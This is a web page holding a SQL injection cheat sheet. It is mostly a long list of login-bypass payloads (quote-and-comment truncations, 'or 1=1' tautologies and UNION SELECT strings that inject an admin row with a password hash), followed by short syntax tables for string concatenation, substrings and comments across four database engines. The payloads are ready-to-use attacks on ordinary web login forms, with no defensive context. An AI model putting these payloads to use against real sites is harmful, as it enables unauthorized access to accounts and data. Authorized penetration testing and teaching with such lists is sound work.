Skip to main content

SQL Injection Cheatsheet

Bypass login - sql

admin' --
admin' -- -
admin' #
admin'/*
' or 1=1--
' or 1=1-- -
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—

x' or ‘x’='x

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

String concatenation

DatabaseString Concatenation
Oracle
'foo'||'bar'
Microsoft
'foo'+'bar'
PostgreSQL
'foo'||'bar'
MySQL
CONCAT('foo','bar')

Substring

Extract part of a string from abcdefg string. All the substrings below example return ef as 5 is the start position and return 2 chars from there.

DatabaseSubstring
Oracle
SUBSTR('abcdefg', 5, 2)
Microsoft
SUBSTRING('abcdefg', 5, 2)
PostgreSQL
SUBSTRING('abcdefg', 5, 2)
MySQL
SUBSTRING('abcdefg', 5, 2)

Comments

DatabaseComments
Oracle
--comment
Microsoft
--comment
/*comment*/
PostgreSQL
--comment
/*comment*/
MySQL
-- comment
/*comment*/
#comment

Observe the space after the --